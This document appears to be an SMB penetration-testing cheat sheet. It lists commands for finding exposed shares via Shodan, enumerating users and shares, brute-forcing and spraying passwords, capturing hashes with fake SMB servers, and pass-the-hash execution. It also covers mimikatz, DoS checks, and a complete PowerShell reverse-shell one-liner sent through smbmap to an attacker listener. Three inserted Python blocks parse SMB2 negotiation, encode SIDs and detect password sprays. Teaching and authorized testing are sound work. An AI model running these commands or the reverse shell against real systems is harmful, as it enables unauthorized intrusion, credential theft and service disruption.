
SMB Pentesting Best Practices

SMB

SMB usually uses TCP port 445.

What is SMB?

SMB is a network file and resource sharing protocol that uses a client-server model. SMB clients such as PCs on a network connect to SMB servers to access resources such as files and directories or perform tasks like printing over the network.

Often, the term CIFS, short for Common Internet File System, is used interchangeably with SMB. That is because CIFS was a popular Microsoft SMB implementation introduced with Windows 95; since then, the informal use of CIFS to refer to SMB has remained common.

PORT     STATE SERVICE               VERSION
445/tcp  open  microsoft-ds 

How SMB Works

At a high level, SMB communication is easy to understand. SMB clients connect to an SMB server over the SMB port to access SMB shares. Once they have access to a share, clients can do things such as collaborate on files without downloading them to their machines, or print using a networked printer.

What is an SMB client?

An SMB client is the device that accesses resources on an SMB server. For example, within a corporate network, the user PCs that access a shared drive are SMB clients.

What is an SMB server?

An SMB server is the network server or cluster of servers where SMB shares are stored. The SMB server grants or denies SMB clients access to the shared resources (a.k.a. SMB shares).

What is an SMB Share?

An SMB share, also known as an SMB file share, is simply a shared resource on an SMB server. Often, an SMB share is a directory, but it can be any shared resource. For example, network printers are often shared using SMB.

What is the SMB port?

By default, modern implementations of SMB use TCP port 445 as the SMB port. Older SMB implementations (pre-Windows 2000) used SMB port 139.

Versions of SMB: Understanding SMB v1, SMB v2, and SMB v3

  • SMB v1 (SMB1): The original SMB version. SMB1 dates from the 1980s and has gone through multiple iterations. In Windows 95, Microsoft introduced CIFS as an implementation of SMB1. In modern deployments you should NOT use SMB v1, because it is insecure (no encryption; exploited in attacks like WannaCry and NotPetya) and inefficient (very "chatty" on the network, causing congestion and reduced performance).
  • SMB v2 (SMB2): SMB2 was introduced with Windows Vista. It brought significant improvements in performance and simplicity over SMB1, as well as security enhancements. For example, SMB2.0.2 introduced pre-authentication integrity, and SMB2 is not vulnerable to the WannaCry and NotPetya exploits that make SMB1 a security risk. SMB v2.1 was introduced with Windows 7 and Server 2008 R2, further improving performance and oplocks (opportunistic locking).
  • SMB v3 (SMB3): SMB3, which introduced end-to-end SMB encryption, and its later revisions are the most advanced and secure implementations of SMB. The first release (SMB v3.0) shipped with Windows 8 and Server 2012. SMB v3.02 was introduced in Windows 8.1 and Server 2012 R2. SMB 3.1.1, the latest SMB dialect, was introduced with Windows 10 and Server 2016.

Information About SMB Versions

SMB Version    OS Build
SMB1           Win2000 / XP / 2003
SMB2.0         Vista / 2008
SMB2.1         Win7 / 2008R2
SMB3.0         Win8 / 2012
SMB3.02        Win8.1 / 2012R2

SMB Pentesting

Shodan search queries:
port:445
# File shares: "Authentication: disabled" port:445
# Specifically domain controllers: "Authentication: disabled" NETLOGON SYSVOL -unix port:445
# Concerning files: "Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445
# SMB authentication enabled and SMB version 1: port:445 country:CA region:NB "SMB Status Authentication: enabled SMB Version: 1"
# SMB version 1: "SMB Version: 1"

Scan a network searching for hosts:

nbtscan -r 10.10.x.x/24

SMB version enumeration:

msf > use auxiliary/scanner/smb/smb_version
# Discover real samba version if hidden
sudo ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' & smbclient -L //10.10.x.x
crackmapexec smb 10.10.x.x 
nmap -sV -p445 --script smb-protocols 10.10.x.x

Challenge/response support and SMB signing status can be checked:

nmap -sV -p445 --script=smb-security-mode 10.10.x.x
nmap -sV -p445 --script=smb2-security-mode 10.10.x.x
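What the version table above and the smb2-security-mode check actually look at is the SMB2 NEGOTIATE response: the server's chosen dialect, its SecurityMode bits (signing enabled / signing required), its capability bits, and the SystemTime/ServerStartTime fields that smb2-time reports. The following Python is an added example, not code from the original post or from nmap: it parses a constructed NEGOTIATE response (the sample frame is built in the block, it is not a capture) using the field layout from MS-SMB2, and flags the two settings a defender would want fixed, a server that does not require signing and a pre-3.0 dialect with no encryption available.

```python
import struct
from datetime import datetime, timedelta, timezone

# SMB2 dialect codes (MS-SMB2 NEGOTIATE), mapped to the version names in the table above.
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}
# SecurityMode bits of the NEGOTIATE response; these are what smb2-security-mode reports.
SIGNING_ENABLED = 0x0001
SIGNING_REQUIRED = 0x0002
# Capabilities bit set by SMB 3.0 / 3.0.2 servers that support encryption.
# (SMB 3.1.1 advertises encryption in negotiate contexts, which this example does not parse.)
CAP_ENCRYPTION = 0x0040

SMB2_HEADER = "<4sHHIHHIIQIIQ16s"      # 64-byte SMB2 packet header
NEGOTIATE_RESP = "<HHHH16sIIIIQQHHI"   # 64-byte fixed part of the NEGOTIATE response
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime, or None if unset."""
    return None if ft == 0 else EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime; used here only to build the constructed sample."""
    return int((dt - EPOCH_1601).total_seconds()) * 10_000_000


def parse_negotiate_response(frame):
    """Parse a direct-TCP SMB2 frame: 4-byte NetBIOS session header, then the SMB2 message."""
    if len(frame) < 4:
        raise ValueError("frame too short for a NetBIOS session header")
    length = int.from_bytes(frame[1:4], "big")
    msg = frame[4:4 + length]
    if len(msg) < 128:
        raise ValueError("truncated SMB2 NEGOTIATE response")
    (proto, hdr_size, _credit_charge, _status, command, _credits, _flags, _next_cmd,
     _msg_id, _pid, _tid, _session_id, _signature) = struct.unpack(SMB2_HEADER, msg[:64])
    if proto != b"\xfeSMB" or hdr_size != 64:
        raise ValueError("not an SMB2 message")
    if command != 0x0000:
        raise ValueError("not a NEGOTIATE (command 0) response")
    (struct_size, sec_mode, dialect, _ctx_count, guid, caps, _max_trans, _max_read, _max_write,
     sys_time, start_time, _sec_off, _sec_len, _ctx_off) = struct.unpack(NEGOTIATE_RESP, msg[64:128])
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % struct_size)
    return {
        "dialect": DIALECTS.get(dialect, "unknown (0x%04x)" % dialect),
        "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
        "signing_required": bool(sec_mode & SIGNING_REQUIRED),
        "encryption_capability_bit": bool(caps & CAP_ENCRYPTION),
        "server_guid": guid.hex(),
        "system_time": filetime_to_datetime(sys_time),          # what smb2-time prints
        "server_start_time": filetime_to_datetime(start_time),  # service start / uptime hint
    }


def assess(info):
    """Findings a reviewer would raise from the negotiate result alone."""
    findings = []
    if not info["signing_required"]:
        findings.append("SMB signing not required: relay/tampering risk")
    if info["dialect"] in ("SMB 2.0.2", "SMB 2.1"):
        findings.append("pre-3.0 dialect negotiated: no SMB encryption available")
    return findings


def build_sample_response(dialect=0x0311, security_mode=SIGNING_ENABLED, capabilities=0,
                          system_time=0, start_time=0):
    """Constructed sample NEGOTIATE response (not a capture) used to exercise the parser."""
    header = struct.pack(SMB2_HEADER, b"\xfeSMB", 64, 1, 0, 0x0000, 1, 0x00000001,
                         0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(NEGOTIATE_RESP, 65, security_mode, dialect, 0, b"\x11" * 16, capabilities,
                       0x800000, 0x800000, 0x800000, system_time, start_time, 128, 0, 0)
    msg = header + body + b"\x00"   # one buffer byte so that StructureSize 65 is honoured
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


if __name__ == "__main__":
    info = parse_negotiate_response(build_sample_response())
    for key, value in info.items():
        print("%-26s %s" % (key, value))
    for finding in assess(info):
        print("FINDING:", finding)
```

Feeding the parser a real frame would mean reading the first response after sending a NEGOTIATE request on port 445; the point here is the field layout, so that the output of smb2-security-mode and smb2-time can be read knowing which bits and fields they come from. Signing being merely "enabled" (the Windows default for non-DC members) is the condition that leaves a server open to relay; "required" is the setting to verify.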

Connection Tools

Linux:

smbclient
smbget
Impacket example scripts (/usr/share/doc/python-impacket/examples/):
smbexec.py and psexec.py
wmiexec.py
smb4k

Windows:

net use

Possible Credentials

Usernames                  Common Passwords
(blank)                    (blank)
guest                      (blank)
Administrator, admin       (blank), password, administrator, admin
arcserve                   arcserve, backup
tivoli, tmersrvd           tivoli, tmersrvd, admin
backupexec, backup         backupexec, backup, arcada
test, lab, demo            password, test, lab, demo

Obtain Information

#Dump interesting information
enum4linux -a -u "0xhav0c" -p "Password123!" 10.10.x.x
nmap --script "safe or smb-enum-*" -p 445 10.10.x.x

#Connect to the rpc
rpcclient -U "" -N 10.10.x.x #No creds
rpcclient //192.168.x.x -U secybr.local/0xhav0c%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 secybr.local/0xhav0c:'Password123!'@192.168.x.x
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 secybr.local/0xhav0c:'Password123!'@192.168.x.x

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 secybr.local/0xhav0c:'Password123!'@192.168.x.x
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 secybr.local/0xhav0c:'Password123!'@192.168.x.x
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 secybr.local/0xhav0c:'Password123!'@192.168.x.x

nmblookup -A 10.10.x.x # Get NetBIOS from IP
enum4linux -a -R 500-600,950-1150 10.10.x.x # Enumeration using enum4linux (identifies the name/domain, users and shares)

####################
List shares
####################
smbclient -L //10.10.x.x
smbclient -L 10.10.x.x

####################
Connect
####################
smbclient \\\\192.168.x.x\\share 
smbclient -U "secybr.local\0xhav0c" \\\\10.10.x.x\\IPC$ password # Connect
smbclient -U "" -N \\\\10.10.x.x\\IPC$ # Specify username and no pass

####################
Nullinux for users and shares
####################
#Installation
git clone https://github.com/m8r0wn/nullinux
cd nullinux
sudo bash setup.sh
# Usage
python3 nullinux.py -users -quick secybr.local
python3 nullinux.py 192.168.x.x/24
python3 nullinux.py -u 'secybr.local\0xhav0c' -p 'Password123!' 10.10.x.x

# Other Enumeration Commands
smbmap -u 0xhav0c -p Password123! -d secybr.local -H 192.168.x.x # Smbmap for domains (List share drives, drive permissions, share contents, upload/download functionality..) | Basic enumeration (password or NTLM hash)
smbmap -u '0xhav0c' -p 'Password123!' -d secybr.com -H 10.10.x.x -x 'net group "Domain Admins" /domain' # Remote command execution
smbmap -H 10.10.x.x -u 0xhav0c -p 'Password123!' -r 'C$\Users' # Non-recursive path listing
smbmap --host-file AD-HOSTS.txt -u 0xhav0c -p 'Password123!' -d secybr.com -F 'password' # File content searching (not stable)
smbmap -H 192.168.x.x -u 0xhav0c -p 'Password123!' -d secybr.com -L # Drive listing

####################
# Nifty Shell
####################
python smbmap.py -u 0xhav0c -p 'Password123!' -d secybr.local -H 192.168.x.x -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.y.y""""; $port=""""1337"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 

nc -l 4445 # Listener on the attacker machine

Enumerating LSARPC and SAMR with rpcclient

You can use the Samba rpcclient utility to interact with RPC endpoints via named pipes. The following lists commands that you can issue to the SAMR, LSARPC, and LSARPC-DS interfaces once an SMB session has been established (often requiring credentials).

#Users enumeration
List users: querydispinfo and enumdomusers
Get user details: queryuser <0xrid>
Get user groups: queryusergroups <0xrid>
Get SID of a user: lookupnames <username>
Get users aliases: queryuseraliases [builtin|domain] <sid>
#Groups enumeration
List groups: enumdomgroups
Get group details: querygroup <0xrid>
Get group members: querygroupmem <0xrid>
#Aliasgroups enumeration
List alias: enumalsgroups <builtin|domain>
Get members: queryaliasmem builtin|domain <0xrid>
#Domains enumeration
List domains: enumdomains
Get SID: lsaquery
Domain info: querydominfo
#More SIDs
Find SIDs by name: lookupnames <username>
Find more SIDs: lsaenumsid
RID cycling (check more SIDs): lookupsids <sid>
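The lsaquery, lookupsids and RID-cycling commands above (and enum4linux's -R ranges) all work on one data structure, the SID: revision, sub-authority count, a 48-bit big-endian identifier authority and little-endian 32-bit sub-authorities, the last of which is the RID. The following Python is an added example, not part of the original post or of rpcclient: it encodes and decodes SIDs in the wire format from MS-DTYP, generates the candidate SIDs a RID-cycling lookup asks the server to resolve, and labels the well-known RIDs. The domain SID used in the demo is constructed, not a real domain's.

```python
import struct

# Well-known RIDs in a domain SID (MS-DTYP); everything from 1000 upward is allocated.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 519: "Enterprise Admins",
}


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into the binary SID sent in LSARPC/SAMR calls."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("malformed SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or not 0 <= authority < 2 ** 48 or len(subs) > 15:
        raise ValueError("SID out of range: %r" % sid)
    head = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return head + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(data):
    """Decode a binary SID back to its string form."""
    if len(data) < 8:
        raise ValueError("SID too short")
    revision, count = struct.unpack("<BB", data[:2])
    authority = int.from_bytes(data[2:8], "big")
    if len(data) != 8 + 4 * count:
        raise ValueError("SID length does not match SubAuthorityCount")
    subs = struct.unpack("<%dI" % count, data[8:]) if count else ()
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def split_sid(sid):
    """Split an account SID into the issuing domain SID and the RID (last sub-authority)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def rid_range_sids(domain_sid, start, end):
    """The SIDs a RID-cycling lookup (lookupsids, enum4linux -R) asks the server to resolve."""
    return ["%s-%d" % (domain_sid, rid) for rid in range(start, end + 1)]


def classify_rid(rid):
    """Label a RID as a well-known account/group, an allocated RID, or reserved/unknown."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "allocated" if rid >= 1000 else "reserved/unknown"


if __name__ == "__main__":
    # Constructed domain SID; lsaquery would return the real one for a target domain.
    domain_sid = "S-1-5-21-1111111111-2222222222-3333333333"
    for candidate in rid_range_sids(domain_sid, 500, 503):
        _, rid = split_sid(candidate)
        print(candidate, "->", classify_rid(rid), sid_to_bytes(candidate).hex())
```

From the server's side, RID cycling is a burst of LsarLookupSids calls for consecutive RIDs on a single LSARPC session, most of which fail to resolve; that pattern, rather than any single call, is what a detection rule should key on. Restricting anonymous SID/name translation (the "Network access: Allow anonymous SID/Name translation" policy) removes the unauthenticated variant entirely.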

Create a Fake SMB Share to Capture Credentials

python3 smbserver.py 0xhav0c /File/path/to/share/folder # 0xhav0c == Share Name 

Fake SMB server capturing credentials

SMB Enumeration Scripts with Nmap

nmap -sV -p445 --script=smb-mbenum 10.10.x.x # Master Browser information can be listed.
nmap -sV -p445 --script=smb-os-discovery 10.10.x.x # Operating system version information can be obtained.
nmap -sV -p445 --script=smb-protocols 10.10.x.x # According to the answers to the sent queries, the protocols of the SMB version can be detected.
nmap -sV -p445 --script=smb2-capabilities 10.10.x.x # Lists the capabilities the server advertises for each SMB2/3 dialect.
nmap -sV -p445 --script=smb-enum-domains 10.10.x.x
nmap -sV -p445 --script=smb-enum-groups 10.10.x.x
nmap -sV -p445 --script=smb-enum-processes 10.10.x.x
nmap -sV -p445 --script=smb-enum-sessions 10.10.x.x
nmap -sV -p445 --script=smb-server-stats 10.10.x.x
nmap -sV -p445 --script=smb-system-info 10.10.x.x

OS detection with the smb-os-discovery script

The content of anonymous shares (NULL Session) can be listed.

smbclient -L 10.10.x.x -N
smbmap -H 10.10.x.x
smbmap -H 10.10.x.x -R
net use \\10.10.x.x\IPC$ "" /u:""
rpcclient 10.10.x.x -U "" -N

Shares and their permissions can be listed with guest authorization.

smbget -a smb://10.10.x.x/SharedFolder -R

Download the anonymous shares (NULL Session)

If the command below shows that you have the necessary privileges on a share, you can download the files in it.

smbmap -H 192.168.x.x

Enum Shares & Privileges

First, let's access the shared folder.

smbclient -N \\\\192.168.x.x\\shared_folder

Access the shared File

When using smbclient to copy a directory, use the recurse and prompt commands so that a directory and all of its contents can be copied non-interactively. Then run the following commands.

Caution: this will download all the files. Run smbclient from the directory into which you want the files downloaded.

smb: \> prompt
smb: \> recurse
smb: \> mget *

Downloading all files in a shared folder

Shared printers can be detected.

net view \\10.10.x.x

Text can be printed on shared printers.

nmap -sV -p445 --script=smb-print-text 10.10.x.x

The system clock and the initial start time of the SMB service can be determined.

nmap -sV -p445 --script=smb2-time 10.10.x.x

Backdoors left on the computer can be listed.

nmap -sV -p445 --script=stuxnet-detect 10.10.x.x
nmap -sV -p445 --script=smb-double-pulsar-backdoor 10.10.x.x

Usernames can be detected with the RID technique.

crackmapexec smb 10.10.x.0/24 -d Domain -u Usernames.list -p Password.list --rid-brute
nmap -sV -p445 --script=smb-enum-users 10.10.x.x
msf > use auxiliary/scanner/smb/smb_lookupsid

General information gathering can be carried out: SMB server version, domain name, nbtstat info, MAC address, operating system, users (querydispinfo and enumdomusers), shared directories, anonymous share checks, password policy (via rpcclient), groups, group members, RID and SID info, and more.

enum4linux -a 10.10.x.x

A capture SMB server can be started; by listening on the network, the NTLM/LM challenge-response hashes of users on the network (together with the challenge values they were computed against) can be collected.

msf > use auxiliary/server/capture/smb
msf > use auxiliary/spoof/nbns/nbns_response

Valid username/password pairs (accounts that can log in) can be identified.

nmap -sV -p445 --script=smb-brute --script-args userdb=Usernames.list,passdb=Passwords.list,smblockout=1
msf > use auxiliary/scanner/smb/smb_login
hydra -t 2 -L Usernames.list -P Passwords.list -M IPAdresses.list -s TargetPort smb
medusa -t 2 -T 2 -U Usernames.list -P Passwords.list -H IPAdresses.list -n TargetPort -M smbnt
crackmapexec smb 10.10.x.x/24 -d secybr.local -u Usernames.list -p Passwords.list

Valid username/password-hash pairs can be identified.

msf > use auxiliary/scanner/smb/smb_login
hydra -t 2 -L Usernames.list -P Hashes.list -M TargetIPAdresses.list -s TargetPort -m "LocalHash" smb
medusa -t 2 -T 2 -U Usernames.list -P Hashes.list -H TargetIPAdresses.list -n TargetPort -m PASS:HASH -M smbnt
crackmapexec smb 10.10.x.x/24 -d secybr.local -u Usernames.list -H Hashes.list
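The password and hash guessing commands above leave a characteristic trail on the target: either many failures against one account from one source (brute force) or one or two failures against many accounts from one source (a spray, which is what the default-credential table earlier in the post invites and what the smblockout=1 argument of smb-brute is trying not to trigger). The following Python is an added example, not from the original post or any of the tools it lists: it runs both rules over constructed sample log lines (a simplified key=value rendering of logon attempts, not any product's native format) with a sliding time window per source.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def fmt(ts, src, user, result):
    """Render one constructed sample log line."""
    return "%s src=%s user=%s result=%s" % (ts.strftime("%Y-%m-%dT%H:%M:%SZ"), src, user, result)


def constructed_sample_log():
    """Constructed sample data: one spray source, one brute-force source, one benign user."""
    base = datetime(2022, 5, 1, 10, 0, 0)
    lines = []
    # Spray: one source, a single guess against each of six accounts inside two minutes.
    for i, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"]):
        lines.append(fmt(base + timedelta(seconds=20 * i), "10.10.0.5", user, "failure"))
    # Brute force: one source hammering the 'backup' account from the default-credential table.
    for i in range(12):
        lines.append(fmt(base + timedelta(seconds=15 * i), "10.10.0.9", "backup", "failure"))
    # Benign: one typo followed by a successful logon.
    lines.append(fmt(base + timedelta(seconds=5), "10.10.0.7", "grace", "failure"))
    lines.append(fmt(base + timedelta(seconds=30), "10.10.0.7", "grace", "success"))
    return lines


def parse_line(line):
    """'<iso-timestamp> k=v k=v ...' -> dict with a parsed 'ts' field."""
    ts_str, *pairs = line.split()
    fields = dict(pair.split("=", 1) for pair in pairs)
    fields["ts"] = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")
    return fields


def detect(lines, window=timedelta(minutes=5), spray_users=5, brute_attempts=10):
    """Return sorted alerts: ('password_spray', src) or ('brute_force', src, user)."""
    failures = [e for e in map(parse_line, lines) if e["result"] == "failure"]
    failures.sort(key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in failures:
        by_src[e["src"]].append(e)
    alerts = set()
    for src, events in by_src.items():
        start = 0
        for end in range(len(events)):
            # Slide the window so it spans at most `window` of time ending at events[end].
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            in_window = events[start:end + 1]
            if len({e["user"] for e in in_window}) >= spray_users:
                alerts.add(("password_spray", src))
            for user, n in Counter(e["user"] for e in in_window).items():
                if n >= brute_attempts:
                    alerts.add(("brute_force", src, user))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in detect(constructed_sample_log()):
        print(alert)
```

The thresholds are deliberately simple: an account lockout policy stops the brute-force pattern on its own (and lockouts are what smblockout=1 avoids), but a spray stays under any per-account threshold, so the spray rule has to count distinct accounts per source rather than attempts per account.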

Detailed enumeration can be performed using credentials.

enum4linux -u secybr.local\\0xhav0c -p 'Password123!' -a 10.10.x.x

Shares can be listed using credentials.

nmap -sV -p445 --script=smb-enum-shares --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass='Password123!' 10.10.x.x
nmap -sV -p445 --script=smb-ls --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass='Password123!',share='SharedFolder' 10.10.x.x
nmap -sV -p445 --script=smb-enum-shares,smb-ls --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass='Password123!' 10.10.x.x
msf> use auxiliary/scanner/smb/smb_enumshares
smbclient //10.10.x.x/SharedFolder -U secybr.local\\0xhav0c
smbmap --host-file /path/to/TargetIPAddresses.list -d secybr.local -u 0xhav0c -p 'Password123!' -R
smbmap -H 10.10.x.x -R SharedFolder -A SearchingFileName
pth-smbclient -U secybr.local/0xhav0c%aad3b435b51404eeaad3b435b51404ee //10.10.x.x/SharedFolder
crackmapexec smb 10.10.x.x/24 -d secybr.local -u 0xhav0c -p 'Password123!' --shares
crackmapexec smb 10.10.x.x/24 -d secybr.local -u 0xhav0c -H '53f587baed383d5e8969457609f80a33333331a22a7e651:1b7951d1ee9e3363' --shares

Accessing and downloading a known shared file with smbclient

Detecting shares, then searching for and downloading a known shared file with smbmap

Data from the share can be downloaded using credentials.

msf > use post/windows/gather/enum_shares
smbget smb://10.10.x.x/SharedFolder --user=secybr.local\\0xhav0c -R
mount -t cifs -o username=0xhav0c,password=Password123!,domain=secybr.local //10.10.x.x/SharedFolder /root/Desktop/SharedFile
smbmount //10.10.x.x/SharedFolder /root/Desktop/SharedFile -o username=0xhav0c,password=Password123!,rw
net use T: \\10.10.x.x\SharedFolder Password123! /user:secybr.local\0xhav0c /savecred /p:no

Local users (and users of the domain the computer belongs to) can be listed using credentials.

nmap -sV -p445 --script=smb-enum-users --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x
msf > use auxiliary/scanner/smb/smb_enumusers
msf > use auxiliary/scanner/smb/smb_enumusers_domain

Local groups can be listed using credentials.

nmap -sV -p445 --script=smb-enum-groups --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x

Some other information gathering methods:

# Domain information (password policy, users, etc.) can be listed using credentials.
nmap -sV -p445 --script=smb-enum-domains --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

# Operating system, hardware, web browser and similar information can be listed using credentials.
nmap -sV -p445 --script=smb-system-info --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

# Named pipe information can be listed using credentials.
msf > use auxiliary/scanner/smb/pipe_auditor

#By using credentials, process information running in the operating system can be listed.
nmap -sV -p445 --script=smb-enum-processes --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

#Using the credentials, the service information running in the operating system can be listed.
nmap -sV -p445 --script=smb-enum-services --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 

# Logged-in users can be listed using a username and password (or password hash), on systems where local administrator rights are obtained.
nmap -sV -p445 --script=smb-enum-sessions --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x 
msf > use auxiliary/scanner/smb/psexec_loggedin_users
crackmapexec smb 10.10.x.x/24 -C UsernamePassword.list --lusers

#Operating system SMB server statistics information can be listed using the credentials
nmap -sV -p445 --script=smb-server-stats --script-args smbdomain=secybr.local,smbuser=0xhav0c,smbpass=Password123! 10.10.x.x

#By using the credentials, the passwords registered in the Group Policy Preference in the domain the computer belongs to can be determined.
msf > use auxiliary/scanner/smb/smb_enum_gpp

Files on the SMB share can be retrieved using credentials.

smbclient //10.10.x.x/SharedFolder -U 'secybr.local\\0xhav0c' 'Password123!' -p TargetPort
recurse ON
prompt OFF
mget *

Access to the MS-RPC command line can be achieved using credentials.

rpcclient 10.10.x.x -U 'secybr.local\\0xhav0c'

Command can be run by using username and password information (in systems where local administrator authority can be obtained).

nmap -sV -p445 --script=smb-psexec.nse --script-args=smbuser=Username.list,smbpass=Password.list 10.10.x.x
smbmap --host-file /FullPath/TargetIP.list -d secybr.local -u 0xhav0c -p 'Password123!' -x "net user"
winexe -U secybr.local\\0xhav0c%Password123! //10.10.x.x "net user"
crackmapexec smb 10.10.x.x -u Username -p Password -M mimikatz -o COMMAND=privilege::debug
crackmapexec smb 10.10.x.x -u Username -H '53f587baed383d5e8969457609f80sdfdsfdsfsda22a7e651:1b7951d1ee9e3363' -M mimikatz -o COMMAND=privilege::debug

Executing the Mimikatz module from crackmapexec

Access to the Windows command line (Meterpreter, CMD, Powershell, …) can be achieved by using the username and password information (in systems where local administrator authority can be obtained).

winexe -U secybr.local\\Username%Password //10.10.x.x "cmd.exe" --system
pth-winexe -U secybr.local/0xhav0c%aad3b435b51404eeaad3b435b51404ee //10.10.x.x cmd.exe --system

#Metasploit Framework
msf > use exploit/windows/smb/psexec
msf > use exploit/windows/smb/psexec_psh
msf > use exploit/windows/smb/smb_delivery

#Impackets
python psexec.py secybr.local/0xhav0c:Password123!@10.10.x.x
python smbexec.py secybr.local/0xhav0c:Password123!@10.10.x.x
python wmiexec.py secybr.local/0xhav0c:Password123!@10.10.x.x

#Windows Sysinternals: 
psexec.exe \\10.10.x.x -u secybr.local\0xhav0c -p Password cmd.exe /accepteula

Access to the Windows command line (Meterpreter, CMD, PowerShell, ...) can be achieved with a username and password hash (pass-the-hash), on systems where local administrator rights are obtained.

pth-winexe -U secybr.local\\0xhav0c%aad3b435b51404eeaad3b435b51404ee //10.10.x.x "cmd.exe" --system

#Metasploit Framework
msf > use exploit/windows/smb/psexec
msf > use exploit/windows/smb/psexec_psh

#Impackets
python psexec.py secybr.local/0xhav0c@10.10.x.x -hashes 00000000000000000000000000000000:4a09d6777d034c2a5fced85d044a98e3
python smbexec.py secybr.local/0xhav0c@10.10.x.x -hashes 00000000000000000000000000000000:4a09d6777d034c2a5fced85d044a98e3
python wmiexec.py secybr.local/0xhav0c@10.10.x.x -hashes 00000000000000000000000000000000:4a09d6777d034c2a5fced85d044a98e3

Common SMB Vulnerabilities

DOS vulnerabilities using this service can be detected.

#MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (uncredentialed check) [CVE-2009-2526]
nmap -sV -p445 --script=smb-vuln-cve2009-3103 10.10.x.x
nmap -sV -p445 --script=smb-vuln-cve2009-3103 --script-args unsafe=1 10.10.x.x
msf > use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh 10.10.x.x
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 10.10.x.x

#MS10-006: Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251)
msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

#MS10-054: Vulnerabilities in SMB Server Could Allow Remote Code Execution (982214) [CVE-2010-2551] [CVE-2010-2552] (Remote Memory Corruption. Result is BSOD -> DANGEROUS)
nmap -sV -p445 --script=smb-vuln-ms10-054 --script-args unsafe=1 10.10.x.x

#Service regsvc vulnerability [CVE-2010-2550]
nmap -sV -p445 --script=smb-vuln-regsvc-dos 10.10.x.x

#SMB DOS
nmap -sV -p445 --script=smb-flood --script-args smbdomain=Domain,smbuser=Username,smbpass=Password 10.10.x.x

Various vulnerable systems using this service can be detected.

